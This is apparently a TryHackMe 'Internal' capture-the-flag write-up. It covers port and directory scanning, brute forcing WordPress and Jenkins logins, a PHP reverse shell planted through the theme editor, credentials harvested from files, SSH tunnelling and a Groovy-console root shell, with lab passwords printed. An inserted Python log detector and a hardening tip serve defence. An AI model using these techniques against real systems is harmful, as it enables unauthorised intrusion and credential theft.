TryHackMe - Internal

Enumeration

➜  tmp rustscan -a 10.10.103.231
Open 10.10.103.231:53
Open 10.10.103.231:22
Open 10.10.103.231:80

➜ tmp gobuster dir -u http://10.10.103.231/ -w /usr/share/dirb/wordlists/big.txt
...
/blog (Status: 301) [Size: 313] [--> http://10.10.103.231/blog/]
/wordpress (Status: 301) [Size: 318] [--> http://10.10.103.231/wordpress/]

WordPress Scanning

wpscan --url http://10.10.103.231/blog --usernames admin --passwords rockyou.txt
[!] Valid Combinations Found:
| Username: admin, Password: my2boys

Exploitation

  1. Found credentials in a private post: william:arnold147.
  2. Uploaded PHP reverse shell via WordPress theme editor (404.php).
  3. Found Aubreanna's credentials in /opt/wp-save.txt: aubreanna:bubb13guM!@#123.
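
Seen from the web server's side, the steps above leave a recognizable trail in the access log. The following is an added example, not part of the original write-up: a small detector for repeated login POSTs, writes through the theme editor, and direct requests to a theme's PHP file. It assumes Apache combined log format; the threshold, source IPs, theme name and log lines are constructed for illustration.

```python
import re
from collections import Counter

# Assumption: Apache "combined" access-log format for the WordPress vhost.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LOGIN = re.compile(r'/(?:wp-login|xmlrpc)\.php(?:\?|$)')
EDITOR = re.compile(r'/wp-admin/theme-editor\.php(?:\?|$)')
THEME_PHP = re.compile(r'/wp-content/themes/[^/]+/[^?]*\.php(?:\?|$)')
LOGIN_THRESHOLD = 5  # assumed cutoff; tune to your normal login volume


def detect(lines, threshold=LOGIN_THRESHOLD):
    """Return sorted (source_ip, finding) pairs for the patterns in this write-up."""
    login_posts = Counter()
    findings = set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path, _status = m.groups()
        if method == "POST" and LOGIN.search(path):
            login_posts[ip] += 1
        if method == "POST" and EDITOR.search(path):
            findings.add((ip, "theme-editor-write"))
        if THEME_PHP.search(path):
            # Theme templates are normally included by WordPress, not requested directly.
            findings.add((ip, "direct-theme-php-request"))
    for ip, count in login_posts.items():
        if count >= threshold:
            findings.add((ip, "login-bruteforce"))
    return sorted(findings)


# Constructed sample log lines (not taken from the target in the write-up).
SAMPLE = [
    f'10.9.0.5 - - [01/Jan/2024:10:00:{s:02d} +0000] "POST /blog/wp-login.php HTTP/1.1" 200 3000 "-" "scanner"'
    for s in range(6)
] + [
    '10.9.0.5 - - [01/Jan/2024:10:05:00 +0000] "POST /blog/wp-admin/theme-editor.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '10.9.0.5 - - [01/Jan/2024:10:05:30 +0000] "GET /blog/wp-content/themes/twentyseventeen/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.9.0.7 - - [01/Jan/2024:10:06:00 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.9.0.7 - - [01/Jan/2024:10:06:05 +0000] "GET /blog/wp-content/themes/twentyseventeen/style.css HTTP/1.1" 200 500 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, finding in detect(SAMPLE):
        print(ip, finding)
```

Setting define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the theme editor entirely, which closes the path used in step 2.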

Post-Exploitation

Jenkins Access

Found jenkins.txt indicating a service on 172.17.0.2:8080.

ssh -L 9999:172.17.0.2:8080 aubreanna@internal.thm

Brute-forced Jenkins login: admin:spongebob

Root Access

Executed a Groovy script in the Jenkins script console to get a reverse shell. Found root credentials in /opt/note.txt: root:tr0ub13guM!@#123

ssh root@internal.thm
# cat root.txt